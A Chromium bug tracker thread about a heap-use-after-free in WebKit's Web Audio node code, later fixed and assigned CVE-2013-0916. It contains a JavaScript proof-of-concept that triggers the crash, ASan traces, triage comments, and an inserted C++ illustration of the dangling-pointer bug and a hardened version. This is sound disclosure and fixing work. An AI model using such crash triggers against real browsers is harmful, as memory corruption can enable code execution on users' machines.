
Issue metadata

Status: Fixed
Owner:
Closed: Mar 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Issue 172342: Heap-use-after-free in WebCore::AudioNodeInput::updateInternalBus

Reported by attek...@gmail.com, Jan 25 2013

Issue description

Tested on:

OS:Ubuntu 12.04
Chromium: 26.0.1394.0 (Developer Build 178763)

Repro-file:

<html>
<script>
// Build a small graph: oscillator -> biquad filter -> destination,
// plus a panner that is connected to the filter a moment later.
var context1 = new webkitAudioContext();
var Panner0 = context1.createPanner();
var Oscillator10 = context1.createOscillator();
var BiquadFilter3 = context1.createBiquadFilter();

BiquadFilter3.connect(context1.destination);
BiquadFilter3.frequency.value = 961;
Oscillator10.connect(BiquadFilter3);
Panner0.setPosition(135, 358, 296);
// Connect the panner after rendering has started so the filter input's
// channel configuration changes while the audio thread is running.
setTimeout(function() {
  Panner0.connect(BiquadFilter3);
}, 1);

// Reload almost immediately so the page keeps retrying until the race hits.
setTimeout(function() { location.reload(); }, 2);

</script>
</html>

The test case is a little unstable but should crash if you wait for 10s or so.

ASAN-report:

==20758== ERROR: AddressSanitizer: heap-use-after-free on address 0x7f0b1dff08c8 at pc 0x7f0b50fd36a2 bp 0x7f0b1c55e1f0 sp 0x7f0b1c55e1e8
READ of size 8 at 0x7f0b1dff08c8 thread T93 (AudioOutputDevic)
    #0 0x7f0b50fd36a1 in WebCore::AudioNodeInput::updateInternalBus() ???:0
    #1 0x7f0b50fdde5e in WebCore::AudioSummingJunction::updateRenderingState() ???:0
    #2 0x7f0b519e456a in WebCore::AudioContext::handleDirtyAudioSummingJunctions() ???:0
    #3 0x7f0b519e436f in WebCore::AudioContext::handlePreRenderTasks() ???:0
    #4 0x7f0b51e1b4f9 in WebCore::AudioDestinationNode::render(WebCore::AudioBus*, WebCore::AudioBus*, unsigned long) ???:0
    #5 0x7f0b5434adad in WebCore::AudioPullFIFO::consume(WebCore::AudioBus*, unsigned long) ???:0
    #6 0x7f0b54152d76 in WebCore::AudioDestinationChromium::render(WebKit::WebVector<float*> const&, WebKit::WebVector<float*> const&, unsigned long) ???:0
.
.
.
freed by thread T93 (AudioOutputDevic) here:
    #0 0x7f0b4d857f02 in operator delete(void*) ??:0
    #1 0x7f0b50fd536b in WebCore::AudioNodeOutput::updateNumberOfChannels() ???:0
    #2 0x7f0b51e1431a in WebCore::AudioBasicProcessorNode::checkNumberOfChannelsForInput(WebCore::AudioNodeInput*) ???:0
    #3 0x7f0b50fdde5e in WebCore::AudioSummingJunction::updateRenderingState() ???:0
    #4 0x7f0b519e456a in WebCore::AudioContext::handleDirtyAudioSummingJunctions() ???:0
    #5 0x7f0b519e436f in WebCore::AudioContext::handlePreRenderTasks() ???:0
.
.
.
 

Comment 1 by infe...@chromium.org, Jan 25 2013

Cc: crogers@google.com scherkus@chromium.org dalecur...@chromium.org
Owner: rtoy@chromium.org
Status: Assigned

Comment 2 by rtoy@chromium.org, Jan 25 2013

In a debug build, this test script causes the assertion:

ASSERTION FAILED: numberOfChannels <= MaxBusChannels
../../third_party/WebKit/Source/WebCore/platform/audio/AudioBus.cpp(57) : WebCore::AudioBus::AudioBus(unsigned int, size_t, bool)

Comment 3 by infe...@chromium.org, Jan 26 2013

Should all of these kinds of checks be hard checks in release builds? This is the fourth bug near this code that attekett found, and since it is reachable so easily by JavaScript, we should just fix all these out-of-bounds indicator checks and make them work as hard bailout conditions in release.

Comment 4 by infe...@chromium.org, Jan 31 2013

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta SecSeverity-High OS-All Stability-AddressSanitizer Mstone-24

Comment 5 by cdn@chromium.org, Jan 31 2013

Comment 6 by infe...@chromium.org, Feb 1 2013

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=163216425

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f74ec0e5788
Crash State:
  - crash stack -
  WebCore::AudioNodeInput::updateInternalBus
  WebCore::AudioSummingJunction::updateRenderingState
  - free stack -
  WebCore::AudioNodeOutput::updateNumberOfChannels
  WebCore::AudioBasicProcessorNode::checkNumberOfChannelsForInput
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=162796:162815

Minimized Testcase (0.37 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv95aaQPlXt0lreKwZg5Fl6-anwR6dYU-e0oIA4IBIXe5QhYDyVBvKQgv6TBUgcHuywce7_JDnbexsY2prslvOWLgZoQNKtStmIlk2VSQVGn63wNdz6jD8cBJ807UNXIuwKxNVLLauNdqnEcekgl1R2a_6lpM7cqVhK8obRbOR0E95f-hoxs
<script>
var context1= new webkitAudioContext()
var Panner0=context1.createPanner();
var Oscillator10=context1.createOscillator();
var BiquadFilter3=context1.createBiquadFilter();

BiquadFilter3.connect(context1.destination);
Oscillator10.connect(BiquadFilter3);
setTimeout(function(){
Panner0.connect(BiquadFilter3);
},1)


setTimeout(function(){location.reload()},2)

</script>

Comment 7 by infe...@chromium.org, Feb 1 2013

Cc: -dalecur...@chromium.org rtoy@chromium.org
Owner: dalecur...@chromium.org
This regressed from http://src.chromium.org/viewvc/chrome?view=rev&revision=162810. Dale, can you please help to take a look.

Comment 8 by dalecur...@chromium.org, Feb 2 2013

Owner: rtoy@chromium.org
WebAudio stuff. Over to rtoy.

Comment 9 by parisa@chromium.org, Feb 11 2013

Hey Raymond,

Wanted to followup on this open security bug too (as it relates to Pwnium/Pwn2Own, http://blog.chromium.org/2013/01/show-off-your-security-skills-pwn2own.html).

How's this one going?

Comment 10 by infe...@chromium.org, Feb 13 2013

Labels: -Mstone-24 Mstone-25
Moving M24 bugs to M25.

Comment 11 by parisa@chromium.org, Feb 26 2013

Just chatted with rtoy@ and he's been trying to debug this one: "It's caused by the code accessing an object that has been deleted.  I haven't figured out who is holding onto the deleted object."

crogers@ any ideas?

Comment 12 by infe...@chromium.org, Feb 27 2013

Cc: james....@intel.com

Comment 13 by infe...@chromium.org, Feb 27 2013

Owner: ----
Status: Available
James.wei@, do you have time to look into this? We are having a hard time tracking this.

Comment 14 by james....@intel.com, Feb 27 2013

Cc: xingnan....@intel.com
inferno, I will have a look into it. 
+xingnan in our team.

Comment 15 by infe...@chromium.org, Feb 27 2013

Cc: -james....@intel.com
Owner: james....@intel.com
Status: Assigned

Comment 16 by infe...@chromium.org, Feb 27 2013

Thanks a lot.

Comment 17 by james....@intel.com, Feb 27 2013

inferno, I believe we found the root cause of this issue.

It is caused by the AudioBus in-place optimization.

    // m_actualDestinationBus is set in pull() and will either point to one of our internal busses or to the in-place bus.
    // It must only be changed in the audio thread (or constructor).
    AudioBus* m_actualDestinationBus;

This pointer stores a pointer to the AudioBus of another node when the in-place optimization is applied, and that bus may be freed when the internal bus is updated.

But in unsigned AudioNodeInput::numberOfChannels() const, this bus is used to get the actual number of output channels.
        maxChannels = max(maxChannels, output->bus()->numberOfChannels());

Xingnan and I are working on a patch for it.
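The following is an added illustration, not WebKit code and not the patch that landed in changeset 144417. It models the pattern James describes in the comment above: an AudioNodeOutput keeps a raw m_actualDestinationBus that pull() points at another node's AudioBus, that other node later replaces its bus, and AudioNodeInput::numberOfChannels() then dereferences the stale pointer through output->bus(). It also folds in the hard release-build check inferno asked for in comment 3, by making AudioBus creation refuse more than MaxBusChannels instead of relying on a debug ASSERT. Class and method names mirror WebCore, but their bodies, the MaxBusChannels value of 32, the 128-frame bus length and the panner-to-filter scenario are all assumptions made for the example.

```cpp
// Added illustration, not WebKit code: models the dangling raw-pointer pattern
// from comment 17 (AudioNodeOutput::m_actualDestinationBus) and the hard
// release check proposed in comment 3. Names mirror WebCore; bodies, the
// channel limit and the scenario are assumptions.
#include <algorithm>
#include <cstddef>
#include <memory>
#include <vector>

static const unsigned MaxBusChannels = 32;   // assumed limit, as in the debug assertion

class AudioBus {
public:
    // Hard bailout in release builds instead of a debug-only ASSERT: an
    // out-of-range channel count yields nullptr and the caller must handle it.
    static std::unique_ptr<AudioBus> create(unsigned numberOfChannels, size_t length) {
        if (numberOfChannels == 0 || numberOfChannels > MaxBusChannels)
            return nullptr;
        return std::unique_ptr<AudioBus>(new AudioBus(numberOfChannels, length));
    }
    unsigned numberOfChannels() const { return static_cast<unsigned>(m_channels.size()); }
private:
    AudioBus(unsigned n, size_t length) : m_channels(n, std::vector<float>(length, 0.0f)) {}
    std::vector<std::vector<float>> m_channels;
};

class AudioNodeOutput {
public:
    explicit AudioNodeOutput(unsigned n)
        : m_numberOfChannels(n), m_internalBus(AudioBus::create(n, 128)) {}

    // As quoted in comment 17: set in pull(), points either to our own internal
    // bus or to an in-place bus owned by another node. Nothing refreshes it
    // when that other node deletes its bus.
    void pull(AudioBus* inPlaceBus) {
        m_actualDestinationBus = inPlaceBus ? inPlaceBus : m_internalBus.get();
    }
    AudioBus* bus() const { return m_actualDestinationBus; }
    unsigned numberOfChannels() const { return m_numberOfChannels; }

private:
    unsigned m_numberOfChannels;
    std::unique_ptr<AudioBus> m_internalBus;
    AudioBus* m_actualDestinationBus = nullptr;
};

class AudioNodeInput {
public:
    void connect(AudioNodeOutput* output) { m_outputs.push_back(output); }

    // Vulnerable shape (the line quoted in comment 17): dereferences whatever
    // bus() currently points at, which may be another node's freed AudioBus.
    unsigned numberOfChannelsViaBus() const {
        unsigned maxChannels = 1;
        for (const AudioNodeOutput* output : m_outputs)
            maxChannels = std::max(maxChannels, output->bus()->numberOfChannels());
        return maxChannels;
    }

    // Hardened shape: use the channel count the output itself owns, never a
    // value read through the borrowed in-place pointer.
    unsigned numberOfChannels() const {
        unsigned maxChannels = 1;
        for (const AudioNodeOutput* output : m_outputs)
            maxChannels = std::max(maxChannels, output->numberOfChannels());
        return maxChannels;
    }

private:
    std::vector<AudioNodeOutput*> m_outputs;
};

struct ScenarioResult {
    unsigned unsafeCountBeforeFree;  // vulnerable path, read while the bus is still alive
    bool outputStillHoldsFreedBus;   // raw pointer unchanged after the delete
    unsigned hardenedCount;          // fixed path, safe to call after the delete
    bool oversizedBusRejected;       // hard check refuses MaxBusChannels + 1
};

// Constructed scenario following the repro's graph: panner -> biquad filter.
ScenarioResult runScenario() {
    AudioNodeOutput pannerOut(2);
    AudioNodeInput filterIn;
    filterIn.connect(&pannerOut);

    // Another node's bus is handed to pull() as the in-place destination.
    std::unique_ptr<AudioBus> otherNodeBus = AudioBus::create(2, 128);
    pannerOut.pull(otherNodeBus.get());
    const AudioBus* borrowed = pannerOut.bus();

    ScenarioResult r;
    r.unsafeCountBeforeFree = filterIn.numberOfChannelsViaBus();  // still valid here

    // The other node rebuilds its bus (updateNumberOfChannels / updateInternalBus):
    // the borrowed AudioBus is deleted and pannerOut.bus() now dangles. Calling
    // numberOfChannelsViaBus() from this point on is the heap-use-after-free.
    otherNodeBus = AudioBus::create(4, 128);

    r.outputStillHoldsFreedBus = (pannerOut.bus() == borrowed);
    r.hardenedCount = filterIn.numberOfChannels();
    r.oversizedBusRejected = (AudioBus::create(MaxBusChannels + 1, 128) == nullptr);
    return r;
}
```

The example only compares the stale pointer value and never dereferences it after the delete; under ASan the vulnerable numberOfChannelsViaBus() would report the same READ of size 8 the original report shows. The general lesson is the one James states: a raw pointer that is cached on one thread and aliases memory owned by another object must not be trusted across the owner's reallocation, so derive the channel count from the owner rather than from the borrowed bus. Whether the actual fix took exactly this route should be checked against the changeset linked in comment 20.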

Comment 18 by infe...@chromium.org, Feb 27 2013

Cc: kbr@chromium.org
Thanks for the quick response james.wei@. I have cced Ken(kbr@) who should be able to review your patch.

Comment 19 by kbr@chromium.org, Feb 27 2013

@crogers is a WebKit reviewer and the principal engineer on Web Audio so he should review it.

Comment 20 by infe...@chromium.org, Mar 1 2013

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: Fixed
http://trac.webkit.org/changeset/144417

Comment 21 by scarybea...@gmail.com, Mar 1 2013

Labels: reward-topanel
Awesome!! Thanks Xingnan / James / Raymond / Chris / all :)

Comment 22 by scarybea...@gmail.com, Mar 2 2013

Labels: -reward-topanel reward-1000 reward-unpaid
Another $1000!!

Comment 23 by ClusterFuzz, Mar 3 2013

Project Member
ClusterFuzz has detected this issue as fixed in range 185533:185684.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=163216425

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f74ec0e5788
Crash State:
  - crash stack -
  WebCore::AudioNodeInput::updateInternalBus
  WebCore::AudioSummingJunction::updateRenderingState
  - free stack -
  WebCore::AudioNodeOutput::updateNumberOfChannels
  WebCore::AudioBasicProcessorNode::checkNumberOfChannelsForInput
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=162796:162815
Fixed: https://cluster-fuzz.appspot.com/revisions?range=185533:185684

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95aaQPlXt0lreKwZg5Fl6-anwR6dYU-e0oIA4IBIXe5QhYDyVBvKQgv6TBUgcHuywce7_JDnbexsY2prslvOWLgZoQNKtStmIlk2VSQVGn63wNdz6jD8cBJ807UNXIuwKxNVLLauNdqnEcekgl1R2a_6lpM7cqVhK8obRbOR0E95f-hoxs

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 24 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecImpacts-Beta -SecSeverity-High -Stability-AddressSanitizer -Mstone-25 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High M-25 Type-Bug-Security Performance-Memory-AddressSanitizer

Comment 25 by scarybea...@gmail.com, Mar 12 2013

Labels: -Merge-Approved -M-25 Merge-Merged M-26 Release-0
M26: http://trac.webkit.org/changeset/145456

Comment 26 by parisa@chromium.org, Mar 14 2013

Labels: -reward-unpaid reward-inprocess

Comment 27 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 28 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 29 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 30 by scarybea...@gmail.com, Mar 23 2013

Labels: CVE-2013-0916

Comment 31 by bugdroid1@chromium.org, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 32 by bugdroid1@chromium.org, Apr 5 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 33 by parisa@chromium.org, Jun 10 2013

Labels: -reward-inprocess

Comment 34 by jsc...@chromium.org, Nov 18 2013

Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Comment 35 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 36 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 37 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 38 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 39 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
